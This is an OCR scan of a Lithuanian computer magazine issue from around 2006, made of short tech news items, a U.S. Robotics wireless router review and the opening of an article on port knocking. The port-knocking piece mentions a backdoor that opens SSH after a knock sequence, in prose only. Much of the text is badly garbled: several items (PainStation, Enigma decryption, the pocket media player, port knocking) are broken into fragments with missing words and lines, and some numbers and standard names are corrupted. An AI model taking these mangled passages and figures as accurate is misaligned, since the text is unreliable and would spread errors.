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NELEGALUS SECOND-HAND'AS 


Daugelis įprato manyti, kad mūsų įstatymai — toli gražu ne 
patys tobuliausi pasaulyje. Tačiau ir ganėtinai civilizuotų šalių 
įstatymų leidyboje galima aptikti marazmų. Pavyzdžiui, Japonija 
jau daug metų garsėja tuo, kad daugelis automobilių pas savo 
savininkus užsibūna ne ilgiau 3 metų. To priežastis įstaty- 
mas, priimtas spustelėjus automobilių gamybos gigantams, kuris 
byloja, kad po trijų automobilio eksploatacijos metų būtina pra- 
eiti techninę apžiūrą, po to iki dešimties metų ją reikia praeidi- 
nėti kas dvejus metus, o dar vėliau tai daryti reikia kasmet. 
Problema čia tame, kad kiekvienos tokios procedūros kaina 
kelios tonos žalių, todėl japonams naudingiau reguliariai keisti 
automobilius. Tuo tarpu dabar tokios pačios savo produkcijos 
paklausos užsimanė ir elektronikos gamintojai. Be abejo, tuo 
suinteresuoti valdininkai nesiryžo įvesti privalomos techninės te- 
levizorių ir kompiuterių apžiūros, tačiau nuo šių metų balandžio 
pirmosios įsigalios kitas įstatymas, draudžiantis buitinės elek- 
tronikos perpardavimą! Remdamiesi vartotojų saugumu, valdi- 
ninkai taip planavo sužlugdyti gana populiarias komiso parduo- 
tuves. Vis dėlto pastarųjų pardavėjai pasirodė esą ne iš kelmo 
spirti. Nuo šio! elektronikos keitimo į pinigus faktas bus vadina- 
mas ne pardavimu, o ilgalaike nuoma. 
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GELEZINIS MULAS 


Išlepusiems amerikiečių kareiviams ilgai trunkantys žygiai negy- 
venamomis vietovėmis — sunkus išbandymas. Papildomi ne. 
patogumai 20 kilogramų būtino krovinio (ginklai, šaudme 
nys, maisto davinys, medikamentai ir panašiai), kurį visą laiką 
tenka nešti ant savo pečių. Sužinojusi apie šią problemą, JAV 
gynybos ministerija nusprendė dosniai finansuoti autonominio 
roboto, kuris galėtų pakeisti gyvus mulus, sukūrimą. Kurti ėmė- 
si amerikiečių kompanija „Boston Dynamics“, kuri dabar išdi- 
džiai pristatinėja savo darbo rezultatus. BigDog pavadintas tva- 


rinys šiuo metu yra pats tobuliausias keturkojis robota je 
planetoje. Savo gabaritais jį būtų galima palyginti su nedideliu 
mulu arba dideliu šunimi (ilgis — 1 metras, aukštis — 0,7 m), 


kuris sveria 75 kg, tuo pačiu ant jo galima užkrauti daugiau nei 
40 kilogramų naudingo svorio. Kūrimo metu ypatingas dėme: 
sys buvo skiriamas roboto mobilumui ir patvarumui Jis gali 
judėti iki 3,3 km/h greičiu, kilti į 35 laipsnių šlaitą, be to, jam 
galima iš širdies uždrožti rykšte ar 

rimbu, o jis vis tiek nenukris (ir 
net neįsižeis). 

Roboto viduriai prifarširuoti įvai- 
riausių sensorių, giroskopų, da- 
viklių ir kitos elektronikos, o visa 
tai varo benzininis variklis. Dabar 
BigDog yra testavimo realiomis 
sąlygomis stadijoje. o jeigu įver- 
tinsime tai, kad gynybos ministe- 
rijoje gautu rezultatu ganėtinai pa- 
tenkinti, tai kūrėjams telieka pa- 
dirbėti prie išorinio vaizdo (kuris da- 
bar tiesiog siaubingas) bei ištaisy- 
ti galimas problemas, o tada mo- 
delį bus galima pradėti gaminti se- 
rijiniu būdu. Tiesa, nelabai aišku: 
kuo blogai gyvas mulas? 


PRADĖK DIENĄ GALVOSŪKIU 


Klausimą apie tai, kaip prisiversti (laiku!) atsikelti iš lovos, vei- 
kiausiai galima laikyti retoriniu. Standartiniai žadintuvai proble- 
mos neišsprendžia. O įrenginys, pavadintas Puzzle Alarm Clock 
greičiausiai turi visas galimybes atpratinti tave nuo šio žalingo 
įpročio rytais ilgiau pasivartyti lovoje. Nuo įprastinio žadintuvo 
Puzzle Alarm Clock skiriasi tuo, kad jo išjungimo mygtukas su- 
darytas iš keturių dalių, savo forma primenančių dėlionę (puz- 
zle). Atėjus laikui X kartu su kurtinančiu žadintuvo cypimu dėlio- 
nės detalės aišoka nuo korpuso ir išsilaksto į skirtingas puses 
Dabar norint užkimšti žadintuvą teks ne tik surasti po visą kam: 
barį išmėtytas detales, bet ir jas surinkti į vieną visumą bei 
įstatyti į pradines angas. Ir jeigu dieną su tuo susidorotų ir trejų 
metų vaikas, tai tik pakirdusiam miegaliui tai bus toli gražu ne 
tokia paprasta užduotis: kol su ja susidorosi, spėsi galutinai 
atsibusti. Galiu patikinti, kad tu šio daikčiuko nekęsi, tačiau 
universitete/mokykloje/darbe pasieksi punktualumo rekordus. 
Įrenginį galima įsigyti on-line parduotuvėje BimBamBanana.com 
už 52 dolerius. 
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60 PĖDŲ IKI INTERNETO 


Jeigu tu namie turi plačiajuostį 
intemnetą, prisimink, kiek pastan- 
į tau kainavo jį gauti. Veikiau: 
jai tai buvo visai paprasta: tu 
užėjai į paslaugos tiekėjo biurą, 
asirašei sutartį, sumokėjai šiek 
iek litų, o po savaitės kitos pas 
tave į svečius užsuko barzdotas 
dėdė, kuris atitempė kabelį ir vis- 
ką sukonfigūravo. Tačiau taip se- 
kasi toli gražu ne visiems. Pavyz- 
džiui, vienas Kanados pilietis Ke- 
vinas Lavalis ilgai svajojo apie in- 
ternetą su normaliu greičiu, ta- 
čiau jo nedideliame miestelyje 
o labo 2000 gyventojų) vienintelis variantas buvo prisijungi 
nas per modemą ir 55 Kb greitis. Ir štai vieną nuostabią dieną 
mieste atsirado pirmasis interneto paslaugos tiekėjas, kuris savo 
siųstuvą sumontavo viso labo už kilometro nuo Kevino namu. 
t še tau kad nori: norint užmegzti bevielį ryšį, reikia tiesiogi- 
nio matomumo, o vos už trisdešimties metrų nuo jo namų stovi 
didžiulė bažnyčia, kuri visiškai užstoja vaizdą tarp jo ir siųstuvo. 
Vis dėlto Kevinas taip ilgai laukė ne tam, kad tiesiog imtų ir 
paprasčiausiai pasiduotų. Bandymai sumontuoti anteną ant ku- 
10 nors iš kaimynų namų baigėsi nesėkmingai, todėl jis, viską 
čiai išmatavęs, nusprendė, kad vienintelis būdas pagauti 
ialą — pas save sumontuoti 60 pėdų (18,3 metro) aukščio 
anteną. Plieninis bokštas, 14000 svarų (6350 kg) cemento, 
keletas savaičių statybų ir signalas pagautas. Jeigu nori pa- 
ginti pakartoti Kevino žygdarbį, išsamią instrukciją gali rasti 
www.short-media.com/review.php?r=3018p=1 


Vienas iš 
kas jau nebepamene 


į žaidimų (Pong) eilinį kartą (ni 

kurį būtent) atgimsta. Net neaišku, kaip 

idimas gali išlikti populia- 

ienialu yra tai, 

kas paprasta. Dabar Vokietijoje labiau populiarėja nauja 

dimo automatų versija — PainStation. Šis Pong žaidimo au- 

atas tai masyvus stalas, kurio centre yra ekranas, 0 iš 

pusių išdėstyti rakečių valdymo mygtukai ir specialios 

platformos delnui. Kiekvienas žaidėj turi viena ranka spau- 

dyti mygtukus, o kitą būti pa ant minėtos platformos. Nuo 

si tuo, kad kamuo 

aidėjas akimirksniu iš platformos gauna nesil- 

tuo pačiu ir mūgį iš įmontuotos 

vytinės, kuri įmontuota kitoje delno pusėje. Kaip 

iliu išbandžiusieji automatą, žaidimui tai pride- 

prilygstamo azarto. Pirmasis PainStation automatas sau- 

lo dar o dabar išėjo nauja versija 

kuri tapo dar „ dinamiškesne ir, be jokios abejo- 
nės, kruvi , žaidimų automatas ne toks jau nekalt 

idirbti tiek nemalonių išlydžių sukeltų 

gimų, tiek ir apčiuopiamų įdrėskimų nuo vytinio, todėl žaisti 

leidžiama tik tiems, tinka prisiir 4 atsakomybę. 


automato PainStation skiri 


LINUKSAS TUKSE 


Skiriama tikriesiems linukso fanams. Italų Kompanija „Acme 
Systems“ pradėjo mažaserijinę kompiuterių korpusų gamybą. 
Šių korpusų forma ypatinga — ji atitinka milijonų žmonių garbi- 
namo pingvino Tukso siluetą. Išoriškai naujovė atrodo tiesiog 


puikiai — lygiai kaip Ir originaliame paveikslėlyje. Korpuso aukštis 
yra viso labo 17 cm, o kainoraštyje paminėta kaina tik 30 
eurų. Beje, ar neatrodo keistas toks aukštis? Pabandyk į 17 cm 
sugrūsti bent vieną sisteminę plokštę su procesoriumi, disku, 
maitinimo šaltiniu ir kitais dalykais. Vis dėlto klaidos čia nera 


tiesiog korpusas skirtas išimtinai firminei „Acme Systems“ sis- 
teminei plokštei Acme Fox, kurios gabaritai siekia vos x7,1cm! 
Į šią mažylę gamintojai įsigudrino sukišti 32 bitų 20 MHZ dažniu 
veikiantį RISC procesorių, 4 Mb flash ir 16 Mb operatyvinės 
atminties (visa tai vienoje mikroschemoje), du USB 1.1 lizdus ir 
vieną Ethernet (10/100 Mbit) jungtį. Beje, tokios konfigūracijos 
visiškai pakanka tai pačiai operacinei sistemai paleisti. Siste- 
minė plokštė parduodama atskirai (ne su korpusu ją teks 
pakloti 100 eurų. 


EKSTREMALŪS ŠEDEVRAI 


Kaip ten tavo paranoja? Vis dar bijai netikėto beldimo į duris? 
Ar jau nusprendei, ką darysi ekstremalioje situacijoje su „blo- 
gais“ diskais ir diskeliais? Mesi per langą? Bandysi praryti? Nie- 
ko verta išeitis! Specialiai konspiracijos fanams japonų kompa- 
nijos „Elecom“ ir „Nakabayashi“ praktiškai tuo pačiu metu išlei 
do kompaktinius kanceliarinių pjaustymo mašinų (shredder) mo- 
delius, kurie makaronais gali paversti ne tik popierinius doku- 
mentus. Pavyzdžiui, „Elecom“ įrenginys taip pat pasiruošęs aki- 
mirksniu į lygius gabalėlius supjaustyti ir CD/DVD diskus (sud 
rinamumas su Blu-Ray ir HD DVD nėra patikslintas). Šį monst- 
rą jau pradėta pardavinėti, orientacinė kaina siekia 17850 je- 
nų (maždaug 153 doleriai). „Na 
kabayashi“ įrenginys išsiskiria di- 
desniu universalumu — vienu me- 
tu jis gali sugromuliuoti vieną dis- 
ką arba diskelį, kreditinę kortelę 
arba penkias pašto korteles. Kišti į 
pirštų nerekomenduojama. Kaina 
kol kas nepaskelbta. Beje, jeigu 
jau apsirūpinsi tokiu monstru, ne- 
pamiršk jo prijungti prie nepertrau- 
kiamo maitinimo šaltinio (UPS), 
nes jis neveikia nei su baterijom, 
nei nėra varomas rankomis. 


m 
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DAUG COLIŲ KIEKVIENAM 


Didelių monitorių pasirinkimas auga. Savaime suprantama, kal 
bama ne apie tai, kad jie storė sunkėja, o apie tai, kad 19 
colių įstrižainės skystųjų kristalų ekranų rinkoje kiekvieną dieną 
atsiranda vis daugiau ir daugiau, pasirinkimas auga, o kainos 
pamažu krinta 
Kompanija „Beno“ toliau plečia savo 19 colių SK monitorių 
iją. Šiandieninė naujovė vadinasi FP93V. Techninės mo- 
aus charakteristikos tokios: atsako laikas — 8 ms, ryš- 
umas 270 kd/m kontrastingumas — 550:1, verti- 
ir horizontalūs apžvalgos kampai 160 laipsniu, svo- 
apie 6 kg, gabaritai 483x420x266,6 mm. Sujungi- 
ui su kompiuteriu skirti D-Sub ir DVI lizdai. Be to, šis mo- 
iitorius turi VESA tvirtinimus, todėl jį galima pakabinti ant 
sienos, kur jis taip pat labai gerai atrodys. Kad monitorius 
ant tavo darbo stalo neišsiskirtų vien tik gabaritais, gaminto: 
jas pasirūpino stilingu monitoriaus dizainu — blizgančiu bal- 
tu plastiku ir ergonomiška forma. Kaip ir daugelis BenO mo: 
nitorių, šis modelis turi /-key funkcija — vieną kartą nuspau- 
dus šį mygtuką, nereikės terliotis su ekrano nustatymais, ka- 


nito 


dangi viskas bus padaryta automatiškai. 


ISORINIS RASYMAS 


Nepaisant sparčiai augančio flash kaupiklių populiarumo, 
optiniai diskai nesiruošia užleisti savų pozicijų. Atitinkamai 
išlieka ir aukšta tokių diskų skaitymo bei įrašymo 


J paklausa. Kompanija LG pristatė eilinę šios srities 
ijovę šorinį universalų DVD kaupiklį GSA-2166D. | 
imų formatų sąrašą įeina visi CD, DVD-R/-RW, DVD+R/ 


+RW, DVD-RAM tipai bei dvisluoksniai diskai DVD DL+R ir 

R. Įrenginys pripažįsta LightScribe Direct Disk Labeling tech- 
nologiją, kuri leidžia kurti vaizdus ant nedarbinės kaupiklio 
puses, panaudojant tik optinio kaupiklio priemones. Tiesa, 
su šia technologija turi dirbti patys diskai ir jų įrašymo pro- 
ma, kuri pateikiama komplekte kartu su įrenginiu. Įren, 
s sumontuotas į stilingą juodą korpusą, kuris prie kom 
rio jungiamas per USB magistralę. Jį montuoti galima 
vertikalioje, tiek ir horizontalioje padėtyje 


r 


piu 
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MULTIMEDIA SERVERIS KIŠENĖJE 


Daugialypės terpės (multimedia) įreng 
nių gabaritai nuolat mažėja, todėl šian- 
dien kišenėje galima nešiotis ti gn 
realius dalykėlius. Pav) am, kad 


saugotum nuotraukas, filmus ir muziką, 
kuriuos galima groti/perži 
atkūrim 
jungti 
įrenginys TVi 


ėti ant įvai 
pakanka prie jų pri 
Tai DVICO panijos sukurtė 
mini. Šis grotuvas turi vie- 
arbią savybę: jis neturi ekra- 
nieko negalima ai 


įrenginių 


ą labai 
nėlio, 


nyje saugoma medžiaga. Pastarosios i būti labai daug, 
dangi duomenų saugojimui skirtas 120 Gb kietasis diskas, 
atkurti galima šiuos formatus: JPEG, MP3, WMA, MPEG-1Į 
MPEG-2 ir MPEG-4 (DivX, XVID), AVI ir VOB. Derėtų paminėtiį 
OTG funkciją, t.y. kopijuoti į įrenginį galima tie: 

įrenginių, be kompiuterio tarpininkavimo. Beje, 
užmezgamas per USB 2 TVi, ni gab 
82x127,5x20 mm, o svoris 180 £ 


FILMAS ANT SIENOS 


tai biuro atributas, per kurį 
ai valdžiai demonstruoja 


Jeigu manai, kad projektorius 
kieti kostiumais pasidabinę vadybinin! 
pelno augimo grafikus ir diagrama: ai tu smarkiai klysti. Na. 
mie jis taip pat gali praversti: pa iui, tapti namų kino teatro 
dalimi. O pažaisti kietą šaudyklę, kai vaizdas apima pusę sie- 
nos, patikėk manim, nežemiškas malonumas. Jei ši idėja 
tave suintrigavo, verta sužinoti, kad kompanija „ViewSonic“ ple- 
čia savo tokių įrenginių modelių gretas. Pavyzdžiui, paimkime 
projektorių Cine1000, kurio kraštinių santykis yra 16:9 (kaip tik 
plačiaekraniam namų kino teatrui). Jis sveria 4 kg, užtikrina 
1000 Im šviesos srautą ir 2000:1 kontrastingumą. Prijungimui 
skirtos DVI-I (suderinama su HDCP), kompozitinės, komponen- 
tinės (YPbPr) ir S-Video jungtys. Projektoriai PJ458D Ies0S 
srautas — 2000 Im) ir PJ766D (šviesos srautas - 2500 Im) 
užtikrina optimalią vaizdo peržiūrą ir duomenų atvaizdavimą, todėl 
Jie dieną gali būti panaudoti biure, 0 vakare namie. Jų skiria- 
moji geba yra XGA 1024x768, o kontrastingumas 2000:1. 
PJ458D sveria 2,2 kg, o PJ766D 3,6 kg. 
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RASOME 
SKAITMENINIU FORMATU 


Neseniai pasibaigu- 
CeBIT 2006“ 
parodoje įvairios kom- 
anijos pristatė tokias 
mias naujienas 
pavyzdžiui, nau- 
jas skaitmeninis „Lo- 
gitech“ sukurtas rašik- 
lis io 2 Digital Pen, su 
kuriuo ranka rašytus 
ašus galima aki- 
sniu konvertuoti į 
skaitmeninį formatą. 
Rašiklis bei nauja jo programinė įranga darniau veikia su Mic 
osoft Word ir elektroninio pašto klientais, kas leidžia ranka 
ašytus užrašus tepaspaudus vieną mygtuką perkelti į tekstų 
apdorojimo programa. Be to, rašiklis turi mokymosi režimą, 
nis (kaip Ir sąsaja su individualiais vartotojo žodynais iš Mic- 
osoft Office programų komplekto) leidžia geriau atpažinti su- 
trumpinimus, vardus, terminus ir kitas personifikuotos varto: 
tojo leksikos dalis. Įdomi įrenginio ypatybė yra firminės Logi 
oTags technologijos pritaikymas. Pastarosios technologi- 
nė — paleisti Lipiškas užduotis ne keliaujant daugybę 
u, o tiesiog nupiešus ekrane atitinkamą simbolį. Į kiek 
rašiklio komplektą įeina A5 formato užrašų knygutė. 


sioje 


PASKIRSTYTOS SISTEMOS 
PRIEŠ ANTRĄJĮ PASAULINĮ KARĄ 


Jeigu tu skaitei istorijos vadovėlius apie Anti 
turėtum žinoti, bū 

vidalu. Beje, 

a bebras. Paukš 


ji pasaulinį kai 


šifruotus pranešimus. Tuomet technika ne 


šių pranešimų paslapties ir tik nuo 1995 metų, kuomet pra- 


špublikavo Istorikas Ralfas Erskinas, jais vėl susido- 


„Enigmos“ kodui dešifrauoti buvo sukurtas pro- 

au prireikė daugiau nei 10 metų, kad įdarbinus 

paskirstytus skaičiavimus būtų pasiektas teigiamas rezultatas 

2006 metų vasario 20 dieną kompiuteristams pavyko dešif- 

uoti pirmąjį vokiečių povandeninio U laivo kapitono pasiųstą 

. Antrasis pranešimas buvo dešifruotas praeitą mė- 

ekstas buvo tok us 55 laipsnių kursu nieko 

kstame į nurodytą kvadratą. Pozicija AJ 3995, (vė: 

stiprumas) angavimas (jūros) 3, 10/10 de: 

as) (10) milibarai (ir) kyla, rūkas, mato- 

mumas 1 jūrmylė“. Lieka trečiasis pranešimas, prie kurio dirba 
projekto dalyviai. Palinkėkime jiems sėkmės. 
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Kiekvienos kietos kompanijos gyvenime anksčiau ar vėliau at 
eina tamsūs laikai. Dabar eilė atėjo ir kompanijai „iBill 
1997 metais, ši kontora viso labo per 5 metus bilingo rin 
užėmė lyderio pozicijas ir pasiekė 400 milijonų dolerių apyvar- 
tą. Savaime suprantama, pagrindinės pajamos buvo gauna- 
mos ne iš namų šeimininkių puslapių kompanija special 
zavosi darbe su pornografiniais puslapiais, kurie sudarė 8596 
visų jos klientų. Ir štai 2002 metais „iBill“ užklupo problemos. 
Iš pradžių jų kilo dėl Visa, kuri darbui su XXX svetainėmis įve- 
dė naujas ir ne pačias palankiausias sąlygas. Po to dėl 
tercard, kuri Už darbą su visokiais iškrypėliškais resursais tei- 
ine tvarka pareikalavo „iBill“ sumokėti multimilijoninę bau- 
dą. O dabar — naujas skandalas. Paaiškėjo, kad sistemą nu 
laužė hakeriai ir pagrobė informaciją apie 17 milijonų kompa 
nijos vartotojų: jų telefonų numerius, adresus, elektroninio pa- 
što ir IP adresus, informaciją apie kreditines korteles ir t.t. Nu- 
laužimo faktą nustatė „Secure Science Corporation“ darbuoto- 
jai, kurie internete aptiko phisher'ių svetainę su „iBill“ klientų 
duomenų baze. Apie savo radinį jie tuojau pat pranešė FTB. Be 
abejo, toks nutikimas bilingo kontoros reputacijai buvo ne į nau- 
dą. „IBill“ vartotojai pasipiktino, kad niekas nepasivargino juos 
informuoti apie nulaužimą ir niekas nežino, kaip hakeriai pasi 
naudos gauta informacija. Beje, ar tavęs toje bazėje nėra? : 
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KOKYBIŠKAS GARSAS 


Jeigu ne ypatinga, daug 
kur aprašyta kino teat- 
rų atmosfera, šiandien 
juose smarkiai padau 
gėtų laisvu vietų, ka- 
dangi šiuolaikinės tech- 
nikos galimybės, lei- 
džiančios žiūrėti filmus 
namuose, labai ištoDu- 
lėjo. Būtent tokiems 
įrenginiams priskiriama 
nauja šešių kanalų 
akustinė sistema Mic 
rolab X27. Jos sateli- 
tus — plonus ir stilin- 
gus — galima pastaty- 
ti ant grindų arba pri- 
tvirtinti prie sienos, jų garsiakalbiai apsaugoti magnetir - 
ranu, todėl juos nesibaiminant trikdžių galima statyti šalia kitų 
įrenginių. Kiekviena kolonėlė susideda iš colio skersmens aukš: 
to dažnio garsiakalbio ir jos šonuose įmontuotų trijų colių Vidu- 
tinių dažnių garsiakalbių. | komplektą įeinantis žemų dažnių 
garsiakalbis yra 8 colių skersmens. Kolonėlių galia pagal RMS 
sistemą siekia 50 W, o žemų dažnių garsiakalbio — 100 W, 
gabaritai atitinkamai 205x480x370 mm ir 98x1115x290 
mm. Be to, komplekte pateikiamas ir nuotolinio valdymo pul 
telis. 
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Wifi robotukų armija 


WI-FI TIKRIAUSIAI DABAR VIENAS IŠ PO- 
PULIARIAUSIŲ ŽODŽIŲ KOMPIUTERINĖS 
ĮRANGOS PASAULYJE. LAISVAI PRIEINAMOS 
BEVIELIO INTERNETO PRIEIGOS ZONOS 
DAR KITAIP VADINAMOS „HOT SPOT“ DYGS- 
TA KAIP GRYBAI PO LIETAUS. TODĖL NIEKO 
KEISTO, KAD TINKAMOS BEVIELIO INTER- 
NETO ĮRANGOS PASIRINKIMAS YRA PAKAN- 
KAMAI AKTUALUS KLAUSIMAS. 
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Ilgai netruks, kol bus sertifikuotas naujos kartos bevie- 
lio ryšio standartas 802.11n, padovanosiantis mums 
net penkis kartus didesnį duomenu pralaidumą lyginant 
su dabartiniu 54 Mbit/s 802.11g. O kol kas gamintojai 
iš kailio neriasi stengdamiesi suvilioti naudotojus papil- 
domais megabitais panaudojant įvairiausius aparatūri- 
nius ir programinius patobulinimus. Tikriausiai Tau ne- 
reikia aiškinti, kad bet kokio protokolo galimybių išplėti- 
mas pririša vartotoją prie vieno gamintojo ir jo gamina- 
mos specializuotos įrangos. Todėl labai apsidžiaugėme 
sužinoję apie naujos U.S. Robotics produktų linijos pa- 
sirodymą. Šios kompanijos gaminama produkcija lei- 
džia neprisirišti prie konkretaus aparatūrinio aprūpini- 
mo. Dėl šios naujos technologijos U.S. Robotics gami- 
niai puikiai sutaria su visa tinkline įranga, nepriklauso- 
mai nuo to, ar ją pagamino ta pati kompanija. Jei Cisco 
plačiai žinoma visame pasaulyje saugumo srityje, tai U. 
S. Robotics garsi savo kryptinėmis antenomis, stipri- 
nančiomis radijo signalą ir tuo pačiu išplečiančiomis be- 
vielio tinklo veikimo diapazoną. Kompanijos gaminami 
naujausi tinklo srauto paskirstytojai ir prieigos taškai turi 
MAXg sistemą, galinčią duoti net 125 Mbit/s duomenų 
srauto pralaidumą. Visi U. S. Robotics naujos linijos 
produktai pripažįsta automatinį duomenų suspaudimo 
režimą, kas yra itin efektyvu perduodant bevieliu tinklu 
tekstinius dokumentus ir web turinį. Ilgai nesvarstę nu- 
sprendėme ir mes išbandyti šio gamintojo produkciją. 
Testavimui išsirinkome U.S. Robotics Wireless MAXg 
Router 5461 maršrutizatorių ir Wireless MAX Access 
Point 5451 prieigos tašką bei to pačio gamintojo bevie- 
lio tinklo PCMCIA USR 5411 kortą — MAXg pagreitėji- 
mo efektą galima pasiekti tik naudojantis U.S. Robo- 
tios įranga, priešingu atveju galima naudotis tik stan- 
dartinių IEEE 802.11b ir IEEE 802.14g sąsajų greičiais. 
Prisipažinsime, mus šiek tiek nervina faktas, kad bevie- 
lių tinklu irangos gamintojai kaip įsikandę laikosi juodos 
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spalvos kampuotų korpusų, lyg nieko nebūtų girdėję apie kito- 
kas spalvas bei formas. Tik atidarius įrangos pakuotę U.S. Ro- 
botics mus iškart pradžiugino grakščių linijų, sidabru tviskan- 
čiais korpusais bei ryškiais LED indikatoriais. Tiesą sakant abu 
įrenginiai greičiau primena žadintuvus, o ne bevielio tinklo įran- 
gą (tik nesitikėk, kad jie pažadins tave anksti ryte). Router 5461 
ir Access Point 5451 yra identiškos formos ir skiriasi tik tuo, 
kad 5461 modelis turi Ethernet koncentratorių bei leidžia pri- 
jungti dar keturis įrenginius, be to, jis turi įdiegtą vidinį DHCP 
serverį, atpažįstantį iki 256 vartotojų tiek iš Wi-Fi, tiek iš Ether- 
net tinklų. MAXg Access Point galima naudoti maršrutizaio- 
riaus darbo zonai išplėsti. 

Komplekte kartu su meršrutizatoriumi Wireless MAXg Rouler 
5461 ir prieigos tašku Wireless MAXg Access Point 5451 ga- 
mintojas pateikia specialų programinį aprūpinimą, su kuriuo 
lengvai susitvarkys net ir visai mažai nutuokiantis apie bevielius 
tinklus vartotojas. Neaišku tik, kodėl ši programinė įranga tiek 
daug „sveria“ turint omenyje jos gana ribotas galimybes. Deri- 
nant sistemą maloniai nustebino vienas dalykas: įranga pagal 
nutylėjimą iškart pereina į aukščiausią apsaugos lygi, kartu dar 
aktyvuodama ir ugniasienę, kas yra pakankamai svarbu indivi- 
dualiems vartotojams. Tikriausiai ir Tu nenorėtum, kad vos tik 
paleidus įrangą į Tavo kompiuterį įsibrautų koks nors Petriukas 
iš antros laiptinės. Na, o mus, kaip profesionalus, pradžiugino 
gana lankstus WEB valdymo skydelis, pilnai dubliuojantis ir net- 
gi šiek tiek išplečiantis programinės įrangos galimybes. Pirminis 
abiejų įrenginių konfigūravimas mums nepasirodė itin sudėtin- 
gas, procedūra analogiška kaip ir kitiems tokio pobūdžio įrengi- 
niams: IP adreso įvedimas, administratoriaus slaptažodžio WEB 
valdymo skydeliui nustatymas, IP adreso pagal DHCP paieška 
wksta naudojant standartinius Windows OS įrankius. 

Tiek Router 5461, tiek Access Point 54511 veikia MAXg 
sistemos, kuri, gamintojo teigimu, gali užtikrinti iki 125 Mb/s 
pralaidumą ir prilygsta Super G standartui, pagrindu. Todėl ban- 
dydami šiuos daikčiukus didžiausią dėmesį ir kreipėme į duo- 
menų srauto perdavimo greitį. Visi testai buvo atlikti naudojant 
du pagrindinius Wi-Fi standartus IEEE 802.11b, IEEE 802.114 
bei U. S. Robotics 54g4 (XPress) ir MAXg. Susijungimo greitis 
buvo pasirenkamas automatiškai. Duomenų perdavimas atlik- 
tas naudojant PassMark Performance Test 6.0 programinę įrangą. 
atstumas tarp taškų neviršijo dešimties metrų. 


Abu modeliai mums paliko išties neblogą įspūdį. Beveiki visi 
testai susilaukė aukščiausių įvertinimų. Žinoma, gal būtų šiek 
tiek ir per drąsu teigti, kad tai pati geriausią bevielė įranga, bet 
vis dėlto U. S. Robotics tikrai įeina į lyderių gretas ir idealiai 
tinka individualiam naudojimui. 


Duomenų srautas buvo siunčiamas per USR 5411 PCMCIA kor- 
tą bei bevielio tinklo adapterį /ntel(R) PRO/Wireless 2200BG. 
Pastarasis visų testų metu, nepriklausomai nuo pasirinkto stan- 
darto, rodė vidutinį 22-23 Mbi's srautą. O naudojant USR 5411 
PCMCIA adapterį sulaukėme gana įdomių rezultatų. Visų pirma 
abu įrenginiai naudojant IEEE 802.11b ir IEEE 802.11g standar- 
tus duomenis priiminėjo bei siuntė atitinkamai 6-7 ir 21-22 
Mbit/s diapazone. Naudodami 54g+ (XPress) režimą pasiekėme Wireless MAKg Router 5461 tun įdiegtą spausdiniuvo serve. 
28, o MAXg — net 35 Mbit/s vidutinį duomenų perdavimo greitį. 
Tiesa, MAXg susijungima pavyko pasiekti tik iš antro karto pakei- 
tus kanalą. Tikriausiai Tau iškart kilo klausimas, o kur gi dingo tie 
žadėtieji 125 Mbit/s? Nereikia pamiršti, kad gamintojas pateikia 
dažniausiai sąlyginius rodiklius, kurie dar priklauso ir nuo perduo- 
damų duomenų suspaudimo laipsnio. Reikia įvertinti ir tai, kad 
visada yra paliekamas rezervas papildomam duomenų srautui. 
Be to, tame pačiame dažnyje veikia dauguma buitinių prietaisų 
ty. mikrobangų krosnelės, radijo telefonai ir kt. trukdantys signa- 
lo sklidimui. 

Kalbant apie saugumą, MAXg Router 5461 ir MAXg Access Point 
5451 šiandien pripažįsta visus žinomus Wi-Fi saugumo stan- 
cartus: 64/128 bitų WEP kodavimą, taip pat WPA ir WPA 2.0 
duomenų srauto šifravimą pagal AES ir TKIP algoritmus. 

Tiesa, dar nepaminėjome, kad MAXg Router 5461 turi įdiegtą 
spausdintuvo serverį, palaikantį bet kokį spausdintuvą su USB 
Jungtimi. Labai patogus dalykas, turint omenyje, kad spausdin- 
tuvai su W/-FT gerokai brangesni už įprastus. 

MAXg Router 5461 skirtas daugiau naudoti sujungiant bevie- 
lius Ir Ethernet tinklus, o MAXg Access Point 5451 gali būti nau- 
dojamas išplėsti Ethernet tinklo perimetro ribas. 
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udojant MAXg režimą pavyko pasiekti 35 MbIUS greiįį. Patogus nustatymų valdymas naudojant naršyklę, 


Tuk tuk, tai aš! 

„Port Knocking“. 
Naujas adminų triukas 
JUNGČIŲ SKENAVIMAS — PAMEGTAS 
TINKLO ĮSILAUŽĖLIŲ DARBAS. TAIP GALI- 
MA LEN IGVAI NUSTATYTI AKTYVIUS SER- 
VISUS, IŠAISKINTI NAUDOJAMOS PRO- 
GRAMINĖS ĮRANGOS PAVADINIMĄ IR VER- 
SIJĄ, O PO TO PABANDYTI SURASTI TIN- 
KAMĄ EKSPLOITĄ. KARTAIS JUNGČIŲ SKE- 
NERIS RODO ŠPYGĄ IR SAKO, KAD NU- 
TOLUSIOJE MAŠINOJE NĖRA ATIDARYTŲ 
JUNGČIŲ. BE ABEJO, TEN Iš TIESŲ GALI 
NEBŪTI VEIKIANČIŲ SERVISŲ, TAČIAU 
ĮMANOMAS IR KITAS VARIANTAS — TO- 
KIOS MAŠINOS ADMINISTRATORIUS NAU- 
DOJA PORT KNOCKING METODĄ. 


[„Port...“ — kas?] „Port Knockin, 
J perdavimo technolo; 


labai papr. 
siuos bei 


imsiu paplitusį ir bi 
žino slaptą prisijungim 
to sei 
igu tu rėtum prisijungti prie 
um sukonfigūruoti tok 


naudoja 22 ar bet kokios kitos 
jungties. Juk tokie veiksmai bet 
kuriam patyrusiam administrato- 
riui sukeltų įtarimą. Geriau pada- 
ryti taip, kad bekdoras nustatinėtų bandymus nuosekliai jungtis 
| 1011, 1007, 1033, 1002 įr 1000 jungtis, po ko keletui se- 
kundžių atidarytų priėjima prie SSH jungties. Šio laiko visiškai 
pakaktų norint prisijungti ir patogiai dirbti sistemoje. 

Bandymų jungtis į uždaras jungtis seka vadinama Knock („tuk 
tuk!“). Nepaisant to, kad serveryje uždarytos visos jungtys, visi 
bandymai yra nuolat stebimi, o informacija apie juos registruo- 
jama ugniasienės loguose. Serveris į šiuos bandymus jungtis 
dažniausiai nieko neatsako, tačiau jis juos nuskaito ir apdoroja. 
Jeigu prisijungimų serija apibrėžta specialaus Port Knock demo- 
no nustatymuose, serveryje tuojau pat bus įvykdytas tam tikras 
veiksmas. Daugeliu atvejų atidaroma keletas jungčių, pavyzdžiui, 
22 — kad administratorius galėtų prisijungti prie SSH serviso. 
Vis dėlto tai tik vienas iš galimų variantų. Tokia sistema į teisin- 
